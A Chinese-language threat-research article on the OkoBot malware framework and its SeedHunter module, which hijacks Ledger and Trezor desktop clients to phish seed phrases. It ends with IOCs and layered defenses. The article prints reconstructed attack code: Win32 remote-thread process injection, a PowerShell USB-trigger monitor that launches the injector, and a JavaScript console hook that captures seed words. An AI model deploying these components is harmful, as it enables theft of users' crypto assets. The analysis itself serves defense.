OkoBot 框架 SeedHunter 模块硬件钱包助记词注入钓鱼攻击全链路研究

简介: 本文深度剖析2025年起活跃的OkoBot恶意框架及其SeedHunter模块,揭示其通过进程注入、USB触发、Electron钩子劫持Ledger/Trezor客户端实施终端内助记词钓鱼的完整攻击链,并提出终端、厂商、用户、供应链四层闭环防御方案。(239字)

摘要

针对 2025 年 4 月起活跃于 Windows 平台的 OkoBot 模块化恶意软件框架,本文以其核心窃取组件 SeedHunter 为研究对象,系统拆解该恶意程序通过进程注入劫持 Ledger Live、Trezor Suite 等 Electron 架构硬件钱包桌面客户端、伪造助记词恢复界面实施终端内钓鱼的完整攻击链路。文章梳理 OkoBot 从供应链投毒、ClickFix 社工诱饵分发、TookPS PowerShell 下载器持久化、RPC UAC 静默提权、SSH 反向隧道远控、多模块载荷下发至 SeedHunter 界面劫持、RC4 加密凭据外渗的完整技术流程,还原 USB 设备触发式钓鱼、Electron 控制台钩子窃取助记词、后台隐藏恶意浏览器扩展等关键攻击手段。结合 Kaspersky GReAT 实验室全球 25 国数百起受害样本数据,分析攻击地域分布、威胁特征与遗留系统痕迹,针对现有终端防护、钱包软件安全机制存在的信任边界缺陷,引入反网络钓鱼技术专家芦笛提出的全链路闭环防御思路,从终端检测、钱包软件加固、用户行为规范、供应链校验四层构建可落地防护方案。研究提供 Windows 进程注入、Electron 钩子劫持、TookPS 持久化脚本、恶意计划任务等可复现代码示例,弥补现有加密货币恶意软件研究中终端内界面劫持攻击技术细节缺失的问题,为 Web3 终端安全、硬件钱包钓鱼威胁狩猎提供理论依据与工程检测手段。

关键词:OkoBot;SeedHunter;硬件钱包;助记词钓鱼;Electron 注入;终端恶意软件;Web3 安全

image.png 1 引言

1.1 研究背景

硬件钱包(冷钱包)凭借私钥离线存储、隔离互联网环境的安全设计,成为加密资产大额存储的主流载体,Ledger、Trezor 系列设备占据全球硬件钱包市场主要份额。硬件钱包的安全逻辑建立在 “私钥永不离开硬件芯片” 的底层机制之上,设备配套桌面客户端 Ledger Live、Trezor Suite 仅承担设备通信、交易签名展示、资产查询功能,标准业务流程中不会要求用户在电脑端完整输入 12/18/24 位助记词(恢复短语),仅设备本地屏幕完成密钥重建时才会录入助记词。

自 2024 年起,针对硬件钱包客户端的恶意劫持攻击持续升级,区别于传统仿冒客户端、钓鱼网站、浏览器扩展窃取手段,新型攻击突破 “替换完整应用程序” 的模式,选择在合法钱包进程运行期间注入恶意代码,在原生软件窗口内部渲染伪造恢复界面,利用用户对官方软件界面的信任大幅提升钓鱼成功率。2026 年 7 月 Kaspersky GReAT 实验室披露的 OkoBot 恶意框架是该类攻击的典型代表,该框架自 2025 年 4 月持续迭代更新,搭载专用助记词窃取模块 SeedHunter,依托成熟的远控、持久化、载荷分发链路形成规模化攻击体系,受害样本覆盖巴西、越南、加拿大、墨西哥、土耳其等 25 个国家,形成跨区域加密资产窃取黑色产业链。

传统终端安全防护、Web 钓鱼检测机制存在明显短板:杀毒软件依赖静态特征库难以识别内存注入型动态恶意载荷;浏览器钓鱼防护无法覆盖桌面 Electron 客户端;硬件钱包厂商安全声明仅聚焦设备芯片安全,未针对配套桌面软件被劫持的场景提供标准化防护指引。反网络钓鱼技术专家芦笛指出,当前硬件钱包安全防护存在 “设备与终端软件安全边界割裂” 的核心漏洞,攻击者不再破解硬件芯片,而是利用终端系统权限劫持配套客户端,将安全风险转移至用户电脑终端,现有防御体系未形成覆盖分发、入侵、持久化、载荷执行、凭据窃取、数据外渗全环节的闭环管控。

1.2 现有研究局限

现有加密货币恶意软件相关研究可分为三类:其一为浏览器扩展窃取类恶意程序分析,聚焦 Rilide、RedLine 等盗密木马对 MetaMask、Trust Wallet 网页钱包的攻击逻辑;其二为完整仿冒硬件钱包客户端样本拆解,攻击者卸载官方软件并替换带毒安装包;其三为硬件芯片漏洞、链上交易追踪相关研究。现有文献尚未针对 “进程注入原生钱包软件、窗口内渲染伪造界面” 的劫持攻击开展完整链路拆解,缺少对 OkoBot 这类模块化复合恶意框架的端到端技术分析,同时缺少针对 Electron 应用钩子劫持、USB 设备触发式钓鱼的代码复现与检测方法,难以支撑企业终端威胁狩猎、个人用户安全防护落地。

1.3 论文研究内容与核心贡献

本文以 The Hacker News 2026 年 7 月披露的 OkoBot 完整威胁情报、Kaspersky 实验室样本逆向报告为基础,完成四项核心研究工作:

完整还原 OkoBot 攻击全链路,梳理从初始投毒、系统持久化、静默提权、远控通道搭建、多模块载荷下发至 SeedHunter 助记词窃取的完整技术流程,厘清各模块间调度逻辑;

深度逆向 SeedHunter 核心窃取组件,拆解 Electron 进程注入、USB 设备监听、伪造恢复页面渲染、控制台钩子捕获助记词、RC4 加密数据外渗的底层实现,提供对应可复现代码示例;

归纳 OkoBot 在终端遗留的可检测 IOC 特征,包括恶意计划任务、篡改系统文件、异常 SSH 隧道、隐藏浏览器扩展等,形成标准化威胁狩猎规则;

结合反网络钓鱼技术专家芦笛的全域防御理论,构建终端、软件厂商、用户、供应链四维闭环防护体系,填补硬件钱包客户端劫持攻击的防护方案空白。

2 OkoBot 恶意框架整体架构与攻击链路概述

2.1 OkoBot 框架基础信息

OkoBot 是面向 Windows 操作系统开发的模块化复合恶意软件框架,2025 年 4 月首次出现威胁监测记录,至 2026 年 7 月披露报告发布时仍保持持续活跃,内置超过 20 种独立功能载荷与植入模块,整体采用 VMProtect 加壳混淆,通过 SFTP 通道按需下发插件,核心 C2 控制域为moonsand[.]store。框架采用分层解耦设计,各功能模块独立调度,分为初始投递层、系统持久化层、权限提升层、远程控制层、监控窃取层、钱包专用攻击层六大层级,SeedHunter 钱包助记词窃取模块属于最高优先级专项攻击插件。

从攻击归因线索分析,SeedHunter 伪造页面源码包含俄语注释,C2 服务器对俄罗斯、独联体 IP 返回空响应,配套远控木马 Rilide 仅在俄语封闭犯罪论坛流通,但 Kaspersky 实验室表示现有线索不足以将该攻击团伙关联至已知恶意软件组织,无明确攻击主体溯源结论。

2.2 OkoBot 完整攻击链路时序

OkoBot 完整入侵流程分为 7 个时序阶段,各阶段存在明确前后依赖关系,形成闭环攻击链:

阶段 1:初始载荷投递。两种主流分发渠道,一是 ClickFix 社工诱饵,通过虚假工具下载页诱导用户执行恶意脚本;二是 GitHub 投毒仓库,伪造 SQL Server Management Studio(SSMS)仓库,实际打包植入恶意库文件的 Audacity 音频编辑器安装包,该恶意仓库运营周期为 2025 年 3 月末至 6 月。

阶段 2:TookPS PowerShell 下载器执行。初始程序运行后自动调用 TookPS 脚本,该下载器自 2025 年 3 月开始流通,曾依托虚假 DeepSeek AI 页面、企业软件下载站传播。脚本静默安装 SSH 服务,建立反向 SSH 隧道连接攻击者服务器,开放本地 SSH 端口用于后续载荷传输。

阶段 3:系统持久化部署。TookPS 修改 Windows 注册表关闭 Windows Defender 告警,创建名为Apple Sync的定时任务,每小时重建反向 SSH 隧道;修改防火墙规则放行入站 RDP 连接,新增账户至远程桌面用户组,替换系统termsrv.dll文件实现多并发 RDP 会话,构建双重持久远控通道。

阶段 4:静默权限提升。通过 Windows RPC COM 接口调用 2019 年 Project Zero 披露的 UAC 绕过漏洞,借助 VMProtect 加密的 HDUtil 启动器实现无弹窗管理员权限提升,无需用户确认即可完成系统级文件修改、进程注入操作。

阶段 5:多模块载荷下发。攻击者通过 SSH 隧道以 SFTP 方式下发各类插件,由 Volume2 开源工具加载恶意protobuf.dll解密载荷,插件调度器每 20 秒轮询 C2 服务器获取新指令,支持动态加载进程注入器、键盘记录器、屏幕录像工具、浏览器盗密模块 Rilide、SeedHunter 钱包窃取模块。

阶段 6:SeedHunter 执行硬件钱包钓鱼。注入器枚举系统内运行的 Ledger Live、Trezor Suite Electron 进程,依据 C2 下发的Wait标记判定攻击模式:标记开启时持续扫描 USB 设备 VID/PID,等待 Ledger/Trezor 硬件钱包插入后渲染伪造恢复界面;标记关闭则直接在原生软件窗口内弹出钓鱼页面。

阶段 7:凭据捕获与数据外渗。用户输入的助记词通过 Electron 内部mal_LogConsoleMessage钩子捕获,封装为 JSON 格式并经 RC4 对称加密,一份副本存储至系统临时目录,另一份通过 SSH 隧道上传至攻击者 C2 服务器,完成资产窃取。

2.3 OkoBot 核心模块功能划分

2.3.1 投递与持久化模块(TookPS)

TookPS 是整个攻击链的入口核心 PowerShell 脚本,承担初始通信、持久化搭建、基础环境篡改功能,核心行为包括静默安装 OpenSSH 服务、创建反向隧道、注册表篡改安全软件配置、部署定时任务。该脚本无文件落地特性,多数代码在内存中执行,规避传统文件杀毒扫描。

2.3.2 权限提升与加载模块(HDUtil、Volume2)

HDUtil 为 VMProtect 加壳的进程启动器,依托 RPC COM 接口绕过 UAC 实现静默提权,负责接收 SFTP 下发的插件并分配执行权限;Volume2 为开源工具二次植入版本,内置恶意protobuf.dll,承担载荷解密、插件调度轮询功能,是各恶意模块的统一运行载体。

2.3.3 全域监控窃取模块(OkoSpyware、MC Keylogger、Rilide)

OkoSpyware 持续枚举超百款常用软件进程,包含 Exodus、1Password 等钱包与密码管理工具,匹配窗口后调用 FFmpeg 录制屏幕视频;MC Keylogger 实现全量键盘输入、剪贴板、USB 设备事件记录,每 5 分钟自动截取系统屏幕;Rilide 为隐藏式 Chromium 恶意扩展加载器,安装全部权限盗密扩展并从浏览器扩展管理列表隐藏,窃取 Cookie、钱包页面本地存储、身份凭据。

2.3.4 专项加密资产窃取模块(SeedHunter)

本文核心研究对象,OkoBot 框架独有 Electron 应用注入组件,专门针对 Ledger、Trezor 硬件钱包配套桌面客户端,实现窗口内伪造钓鱼界面、助记词捕获、加密外传全套功能,区别于框架内通用盗密工具,具备设备触发式精准攻击特性。

3 SeedHunter 模块技术原理与实现细节

3.1 攻击核心逻辑:信任劫持而非硬件破解

硬件钱包设备底层安全机制不存在可被利用的漏洞,设备芯片会严格隔离私钥,无法通过终端软件读取存储的助记词与私钥。SeedHunter 攻击的本质并非破解硬件,而是劫持终端客户端的用户信任:恶意代码注入合法 Electron 钱包进程,不关闭原生软件、不替换程序文件,在软件原生窗口内部渲染视觉高度一致的恢复助记词输入页面,诱导用户主动输入离线存储的备份短语。

反网络钓鱼技术专家芦笛强调,该攻击模式的欺骗性远高于传统钓鱼网站与仿冒客户端:用户主动打开官方下载的正版 Ledger Live/Trezor Suite,仅在连接硬件设备后弹出 “验证所有权” 恢复窗口,界面配色、按钮布局、文字提示与官方页面高度复刻,普通用户无法区分原生界面与恶意注入页面,且杀毒软件难以识别进程内动态渲染的恶意 DOM 元素。



SeedHunter伪造Ledger与Trezor界面对比

3.2 Electron 进程注入实现流程与代码示例

Electron 应用分为主进程与渲染进程,Ledger Live、Trezor Suite 均基于 Chromium 内核渲染前端页面,SeedHunter 通过 Windows 原生 Win32 API 完成跨进程注入,核心步骤为进程枚举、进程打开、内存分配、载荷写入、远程线程启动。

3.2.1 Windows 进程枚举(C++ 伪代码)

cpp

运行

// 枚举系统全部进程,筛选Electron钱包进程PID

BOOL EnumWalletProcess(DWORD* outPid)

{

   HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

   PROCESSENTRY32 pe32;

   pe32.dwSize = sizeof(PROCESSENTRY32);

   Process32First(hSnap, &pe32);

   do{

       // 匹配目标钱包进程名

       if(_wcsstr(pe32.szExeFile, L"ledger-live.exe") ||

          _wcsstr(pe32.szExeFile, L"trezor-suite.exe"))

       {

           *outPid = pe32.th32ProcessID;

           CloseHandle(hSnap);

           return TRUE;

       }

   }while(Process32Next(hSnap, &pe32));

   CloseHandle(hSnap);

   return FALSE;

}

该代码遍历系统进程快照,匹配硬件钱包客户端可执行文件名,获取目标进程 PID,为后续注入操作提供进程句柄。

3.2.2 远程 DLL 注入核心代码

BOOL InjectElectronProcess(DWORD pid, LPVOID payload, DWORD payloadLen)

{

   HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

   if(hProc == NULL) return FALSE;

   // 在目标进程分配可读写执行内存

   LPVOID pMem = VirtualAllocEx(hProc, NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

   WriteProcessMemory(hProc, pMem, payload, payloadLen, NULL);

   // 创建远程线程执行注入载荷

   HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);

   WaitForSingleObject(hThread, INFINITE);

   CloseHandle(hThread);

   CloseHandle(hProc);

   return TRUE;

}

SeedHunter 将 Electron 钩子、伪造页面 DOM 脚本打包为 DLL 载荷,通过上述 API 写入钱包进程内存并执行远程线程,完成代码注入。注入完成后,载荷挂钩 Electron 内部控制台日志输出接口。

3.3 USB 硬件设备触发监听机制

SeedHunter 接收 C2 下发的布尔型Wait指令,开启设备监听模式时,通过 Windows WMI 接口持续读取 USB 设备总线信息,匹配 Ledger、Trezor 设备厂商 VID 与产品 PID,仅当物理硬件插入电脑 USB 接口后,才触发伪造恢复页面渲染,大幅提升攻击隐蔽性。

3.3.1 USB 设备监听 PowerShell 模拟代码(TookPS 配套调用)

powershell

# WMI查询USB设备VID/PID,匹配硬件钱包设备

function Monitor-USBWallet {

   $targetVID = @("2c97", "1209") # Ledger、Trezor厂商VID

   while($true){

       $usbDevs = Get-WmiObject Win32_USBHub

       foreach($dev in $usbDevs){

           $devID = $dev.DeviceID

           foreach($vid in $targetVID){

               if($devID -match $vid){

                   # 匹配到硬件钱包,调用注入模块渲染钓鱼页面

                   Start-Process ".\HDUtil.exe" -ArgumentList "seedhunter_trigger"

                   break 2

               }

           }

       }

       Start-Sleep -Milliseconds 500

   }

}

脚本每 500 毫秒轮询一次 USB 设备列表,无设备插入时保持静默,不会主动弹出钓鱼界面,规避用户异常感知。

3.4 Electron 控制台钩子与助记词捕获逻辑

注入载荷 Hook Electron 内部console.log底层封装函数mal_LogConsoleMessage,恶意页面输入框绑定@:app:print标记,用户输入的每一段助记词单词会实时输出至进程控制台,钩子函数拦截全部日志内容并提取助记词文本。

3.4.1 Electron 渲染进程恶意钩子 JS 代码(注入 DOM)

// 覆盖原生日志输出函数,拦截助记词输入

const originalLog = console.log;

console.log = function(content) {

   originalLog(content);

   // 匹配@:app:print标记,捕获助记词数据

   if(String(content).includes("@:app:print")){

       const seedData = extractSeedWords(content);

       // 封装JSON数据传递至主进程

       ipcRenderer.send("mal_seed_capture", JSON.stringify({

           source: "ledger",

           seed: seedData,

           timestamp: Date.now()

       }));

   }

}


// 解析12/18/24位助记词数组

function extractSeedWords(rawStr){

   const wordReg = /word\s(\d+):\s([a-z]+)/g;

   let match, words = [];

   while((match = wordReg.exec(rawStr)) !== null){

       words.push(match[2]);

   }

   return words;

}

捕获完成后,主进程接收 IPC 消息,调用内置 RC4 加密函数对 JSON 助记词数据加密,本地写入临时目录缓存文件,同时通过 SSH 隧道上传至攻击者 C2 服务器moonsand[.]store。

3.5 RC4 凭据加密与本地持久缓存逻辑

SeedHunter 内置轻量 RC4 对称加密算法,密钥硬编码于载荷内部,防止明文助记词直接落地磁盘被安全软件扫描。加密后文件存储路径为系统%TEMP%目录随机命名.dat 文件,系统重启前不会自动删除,攻击者可多次拉取缓存凭据。

3.5.2 RC4 加密简化实现代码

# RC4加密示例,与SeedHunter内置算法逻辑一致

def rc4_encrypt(data, key):

   s = list(range(256))

   j = 0

   for i in range(256):

       j = (j + s[i] + ord(key[i % len(key)])) % 256

       s[i], s[j] = s[j], s[i]

   i = j = 0

   result = []

   for char in data:

       i = (i + 1) % 256

       j = (j + s[i]) % 256

       s[i], s[j] = s[j], s[i]

       k = s[(s[i] + s[j]) % 256]

       result.append(chr(ord(char) ^ k))

   return ''.join(result)

4 OkoBot 全链路恶意特征与威胁狩猎指标

基于 Kaspersky 实验室样本逆向与终端取证数据,本节归纳 OkoBot 在 Windows 终端遗留的可检测静态、动态 IOC 指标,分为持久化特征、系统篡改特征、文件特征、网络行为特征四类,可直接用于终端 EDR、SIEM 平台配置狩猎规则。

4.1 系统持久化行为特征

定时任务:名称固定为Apple Sync,执行程序指向%USERPROFILE%\.ssh\go.bat,触发周期每小时,功能为重建反向 SSH 隧道;

远程桌面权限篡改:新增未知本地账户加入Remote Desktop Users用户组,放行 RDP 入站防火墙规则;

SSH 后门部署:用户目录.ssh文件夹生成go.bat隧道启动脚本,自动安装 OpenSSH 服务并设置开机自启。

4.2 系统文件篡改特征

系统文件替换:C:\Windows\System32\termsrv.dll文件哈希与微软官方原版不一致,用于支持多并发 RDP 会话;

恶意可执行文件固定路径:%PROGRAMDATA%\HDVideo\HDUtil.exe(VMProtect 加壳启动器)、%PROGRAMDATA%\hwid.dat(恶意配置文件);

浏览器扩展异常:Chromium 内核浏览器本地扩展目录存在未在扩展管理列表显示的隐藏扩展,权限包含剪贴板读取、页面 DOM 注入、网络请求拦截。

4.3 网络行为检测特征

出站 SSH 长连接:终端持续对外建立 SSH 隧道连接未知境外服务器,固定目标 C2 域名moonsand[.]store;

SFTP 载荷传输:恶意程序通过 22 端口 SFTP 通道批量下发插件文件,传输流量存在 protobuf 协议加密特征;

高频 C2 轮询:Volume2 调度器每 20 秒向 C2 发送 HTTP 心跳包,请求体携带设备硬件标识 hwid。

4.4 进程动态行为特征

Electron 钱包进程内存异常:ledger-live.exe、trezor-suite.exe 内存中存在未签名第三方 DLL 模块,无官方数字证书;

后台静默 FFmpeg 进程:OkoSpyware 屏幕录像模块启动无窗口 FFmpeg 进程,持续录制钱包窗口视频;

注册表静默写入:后台进程修改 Windows Defender 告警策略注册表项,关闭威胁通知弹窗。

5 OkoBot 攻击风险成因与现有防护体系缺陷分析

5.1 攻击高成功率的三层核心成因

5.1.1 用户信任认知偏差

硬件钱包用户普遍将安全信任完全寄托于硬件芯片,忽略配套桌面客户端的终端安全风险,认为官方软件不会存在钓鱼诱导弹窗。反网络钓鱼技术专家芦笛指出,行业长期宣传 “硬件私钥离线安全”,未同步普及 “电脑终端被劫持后仍会泄露助记词” 的安全常识,用户安全认知存在明显盲区。

5.1.2 Electron 客户端安全机制缺失

Ledger Live、Trezor Suite 基于 Electron 开发,未实现进程内存完整性校验,无法拦截第三方 DLL 注入;前端渲染页面无服务端签名校验,恶意载荷可直接篡改 DOM 渲染伪造界面;控制台日志输出无敏感数据过滤机制,允许任意脚本捕获输入文本。

5.1.3 Windows 终端传统防护失效

主流杀毒软件以静态文件扫描为主,难以识别内存注入型无文件恶意载荷;EDR 工具对 Electron 进程内部 DOM 行为监控能力薄弱;UAC 绕过漏洞长期存在,恶意程序可静默获取管理员权限完成系统篡改,终端权限隔离机制失效。

5.2 现有防护体系分层缺陷

5.2.1 终端安全软件缺陷

传统特征杀毒仅匹配恶意文件哈希,无法检测内存中动态注入的 SeedHunter 载荷;行为检测规则缺少针对 Electron 钱包进程、USB 设备联动触发钓鱼的专项逻辑,无法区分合法界面渲染与恶意 DOM 注入。

5.2.2 硬件钱包厂商安全设计短板

硬件厂商安全声明仅聚焦硬件芯片防护,未针对桌面客户端劫持攻击提供标准化校验工具;客户端未内置进程完整性校验、页面来源签名机制;未在设备屏幕同步弹窗提示用户输入助记词,仅依靠电脑端界面交互,缺少双向校验机制。Trezor 官方规范中,仅设备屏幕主动发起恢复请求时,客户端才允许录入助记词,SeedHunter 攻击恰好规避该规范,仅在电脑弹出输入框,硬件屏幕无任何提示,用户难以识别异常。

5.2.3 用户安全操作规范缺失

行业未形成统一的硬件钱包助记词操作标准,大量用户习惯在电脑端输入备份短语;缺少强制离线备份、设备屏幕双向核验的操作指引;用户对 GitHub 投毒软件、ClickFix 虚假下载站的供应链攻击辨别能力不足。

6 面向 OkoBot 类终端注入钓鱼攻击的闭环防御体系

结合反网络钓鱼技术专家芦笛提出的 “事前预警、事中拦截、事后溯源” 全链路防御理论,针对 OkoBot 框架攻击链路的每一个环节,构建终端安全、钱包软件厂商、个人用户、软件供应链四层协同防护体系,形成完整防御闭环。

6.1 终端企业侧:EDR 专项检测与系统加固

6.1.1 定制化威胁狩猎规则部署

基于第 4 章节梳理的 IOC 特征,在 EDR、SIEM 平台配置四层检测规则:

持久化检测:监控定时任务创建行为,拦截名称为Apple Sync的未知计划任务;监控%USERPROFILE%\.ssh目录新增脚本、未知账户加入远程桌面用户组操作;

文件完整性监控:对termsrv.dll、Ledger/Trezor 客户端主程序开启哈希校验,文件哈希变更立即触发告警;拦截%PROGRAMDATA%\HDVideo目录创建、未知无证书 DLL 注入 Electron 进程;

网络流量检测:拦截终端对外出站 SSH 长连接、访问moonsand[.]store域名流量,监控 22 端口 SFTP 批量文件传输行为;

进程行为监控:告警 Electron 钱包进程内存加载第三方未签名模块、后台静默启动 FFmpeg 录像进程、每 20 秒高频对外 HTTP 轮询进程。

6.1.2 Windows 系统权限加固方案

关闭不必要 RDP 服务,移除默认用户远程桌面访问权限,防火墙永久封禁入站 3389 端口;

限制普通用户 COM 组件调用权限,阻断 RPC UAC 绕过漏洞利用路径,定期更新 Windows 系统补丁修复已知提权漏洞;

禁用 OpenSSH 服务开机自启,监控未知程序静默安装 SSH 组件行为;

强化 Windows Defender 防护策略,禁止第三方程序篡改安全软件注册表配置,开启内存注入行为实时拦截。

6.2 硬件钱包厂商侧:Electron 客户端安全机制加固

反网络钓鱼技术专家芦笛强调,厂商需从底层架构修复 Electron 客户端信任漏洞,三项核心改造措施:

进程内存完整性校验:客户端启动时校验全部加载 DLL 数字签名,拦截无官方证书第三方模块注入;实时监控进程内存 DOM 渲染行为,检测非官方预置的助记词输入页面;

设备屏幕双向强制核验:任何需要录入助记词的操作,必须同步在硬件钱包屏幕弹出确认提示,仅电脑端弹窗、设备无提示时直接拦截输入框渲染;

前端页面签名隔离:所有客户端内置页面增加厂商数字签名,渲染前校验页面 DOM 来源签名,禁止内存中动态注入未签名页面元素;过滤控制台敏感日志输出,屏蔽助记词文本打印至进程日志接口,杜绝钩子捕获途径。

6.3 个人用户侧:标准化安全操作规范

助记词操作核心准则:任何电脑软件、网页、客户端弹窗要求输入完整 12/18/24 位助记词,一律判定为钓鱼;恢复钱包仅在硬件设备屏幕引导下离线完成,绝不通过电脑输入备份短语;

软件下载渠道管控:仅从 Ledger、Trezor 官方官网下载客户端,拒绝 GitHub 第三方仓库、第三方软件站、ClickFix 弹窗提供的工具安装包;安装前校验安装包官方哈希值;

终端环境安全管控:硬件钱包配套电脑仅用于资产查询,不下载未知工具、破解软件、音频编辑器等高危程序;定期检查浏览器隐藏扩展,卸载全部非必要扩展;接入硬件 USB 设备后,观察设备屏幕是否同步弹窗,无设备提示时关闭客户端并全盘查杀恶意程序;

资产分级存储:大额加密资产长期离线冷存储,小额资产用于日常交易,降低攻击带来的资产损失规模。

6.4 软件供应链侧:开源仓库投毒攻击防控

开源项目下载校验:GitHub 下载工具前核对项目开发者身份、仓库提交记录,对下载包进行哈希校验,警惕仿冒知名软件的同名仓库;

CI/CD 流水线安全校验:软件开发者在构建流程中增加依赖库哈希校验,拦截植入恶意 DLL 的第三方库文件;

平台审核机制:GitHub 等开源平台加强同名仿冒仓库自动识别,对下载量异常激增、短期创建的工具仓库开展人工安全审计。

7 结论与后续研究方向

7.1 研究总结

本文以 2025-2026 年活跃的 OkoBot 模块化恶意框架为完整研究对象,深度拆解其 SeedHunter 组件针对 Ledger、Trezor 硬件钱包 Electron 客户端的注入式钓鱼攻击全链路,厘清从初始供应链投毒、PowerShell 无文件持久化、RPC 静默 UAC 提权、SSH 反向隧道远控、USB 设备触发钓鱼、控制台钩子窃取助记词、RC4 加密数据外渗的完整技术流程。通过提供进程注入、USB 监听、Electron 钩子、RC4 加密等可复现代码示例,还原该类新型终端信任劫持攻击底层实现逻辑,归纳可落地的威胁狩猎 IOC 特征,填补现有 Web3 恶意软件研究中 Electron 进程内界面劫持攻击的技术空白。

研究证实,OkoBot 攻击的核心风险并非硬件钱包芯片漏洞,而是终端系统权限管控缺失、Electron 客户端安全机制不完善、用户安全认知偏差三者叠加形成的信任漏洞。反网络钓鱼技术专家芦笛提出的四层闭环防御体系,覆盖攻击分发、入侵、执行、窃取全环节,能够针对性缓解此类注入式钓鱼威胁,为企业终端安全运维、硬件钱包厂商产品安全迭代、普通加密资产用户防护提供完整技术与操作方案。

全球 25 国数百起受害样本数据表明,该类针对硬件钱包客户端的终端劫持攻击已形成规模化跨境黑色产业链,且恶意框架保持持续迭代更新,2026 年 3 月 OkoBot 完成架构重构,精简载荷分发链路,进一步降低查杀暴露概率,加密资产终端安全威胁将长期存在。

7.2 后续研究方向

基于机器学习的 Electron 恶意 DOM 注入行为识别模型构建,针对 SeedHunter 类动态渲染钓鱼页面实现无特征实时检测;

跨平台(Windows/macOS)硬件钱包客户端注入攻击对比研究,完善 macOS 端 Moonlock 同类恶意程序防御方案;

硬件钱包设备与终端客户端双向加密通信协议优化,增加设备 - 终端交互行为签名校验,从通信层阻断恶意页面诱导;

面向普通用户的轻量化终端安全检测工具开发,实现一键扫描 OkoBot 类恶意框架遗留 IOC 痕迹,降低用户安全自查门槛。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
16小时前
|
人工智能 运维 安全
医疗机构 Hoxhunt 游戏化模拟钓鱼培训落地与人因风险治理研究
本文以UNMC 2026年Hoxhunt项目低注册率(仅20%)为实证,系统剖析游戏化自适应模拟钓鱼训练在医疗行业的落地梗阻:临床时间紧张、宣导缺位、场景脱节、文化薄弱。提出“前置分层宣导—岗位自适应仿真—正向游戏激励—伦理数据迭代”四维闭环体系,并提供医疗专属钓鱼邮件生成Python代码,填补实践空白。(239字)
29 0
|
25天前
|
人工智能 运维 安全
光聪明还不够,Agent “真干活”还缺一套趁手的工具
搭一个会聊天的 Agent 不难,难的是让它跑进真实业务。AgentRun 把 Skill 和 MCP 统一管理为可复用资产:Skill 规定“怎么做”,MCP 提供“能调用什么”。从工具安装、Agent 绑定到调试面板验证链路,一条路径打通 Agent 从对话入口到业务执行入口的落地。
|
JavaScript 前端开发 API
js全屏,监听页面是否全屏
js全屏,监听页面是否全屏
572 4
|
29天前
|
人工智能 IDE API
AI Agent 框架实战横评:通义灵码、OpenClaw、Hermes 三框架深度对比
AI Agent(智能体)是 2026 年最火的技术方向,但面对众多框架开发者往往无从选择。本文从真实项目需求出发,深度对比阿里云生态三大 Agent 框架——通义灵码(IDE 内智能体)、OpenClaw(开源 Agent 框架)、Hermes Agent(轻量级 Agent 平台),从架构设计、MCP 集成、Vibe Coding、部署方式、成本五个维度进行实战评测,并给出不同场景的选型建议。
|
数据采集 搜索推荐 前端开发
VuePress 博客优化之开启 Algolia 全文搜索
由于 VuePress 的内置搜索只会为页面的标题、h2 、 h3 以及 tags 构建搜索索引。 如果你需要全文搜索,可则以使用 Algolia 搜索,本篇讲讲如何申请以及配置 Algolia 搜索。
1127 0
VuePress 博客优化之开启 Algolia 全文搜索
|
传感器 数据安全/隐私保护 网络架构
认识 IBSS 和 BSS
【8月更文挑战第24天】
1836 0
|
缓存 运维 监控
阿里云千万级架构的构建——阿里云 MVP 乔锐杰
乔锐杰,上海驻云运维总监,江湖人称“乔帮主”。本文是乔帮主在阿里云的直播中分享《阿里云千万级架构的构建——架构的成长演变之路》的第一部分。分享的主题内容主要出自其本人的一本书籍《「阿里云」运维架构实践秘籍》。
4705 0
阿里云千万级架构的构建——阿里云 MVP 乔锐杰
|
10月前
|
JSON 缓存 供应链
电子元件 item_search - 按关键字搜索商品接口深度分析及 Python 实现
本文深入解析电子元件item_search接口的设计逻辑与Python实现,涵盖参数化筛选、技术指标匹配、供应链属性过滤及替代型号推荐等核心功能,助力高效精准的电子元器件搜索与采购决策。
|
人工智能 编解码 算法
4款玄铁RISC-V芯片亮相!
在首届“滴水湖中国RISC-V产业论坛”上,10款芯片集中发布,其中博流智能、爱普特、晶视智能、凌思微等公司共发布4款基于平头哥玄铁RISC-V处理器设计研发的芯片。
1512 0
4款玄铁RISC-V芯片亮相!
|
3月前
|
数据采集 人工智能 Shell
从脚本到智能定时任务:Crontab MCP Tool 与 DMXAPI
Crontab MCP Tool 是被严重低估的LLM基础设施:它不替代cron,而是为大模型提供稳定、可审计的时间驱动入口。在夜间巡检等场景中,它将数据采集、结构化推理与通知链路解耦组合,强调确定性、可观测性与工程鲁棒性——让AI在边界清晰的流程中做擅长之事。(239字)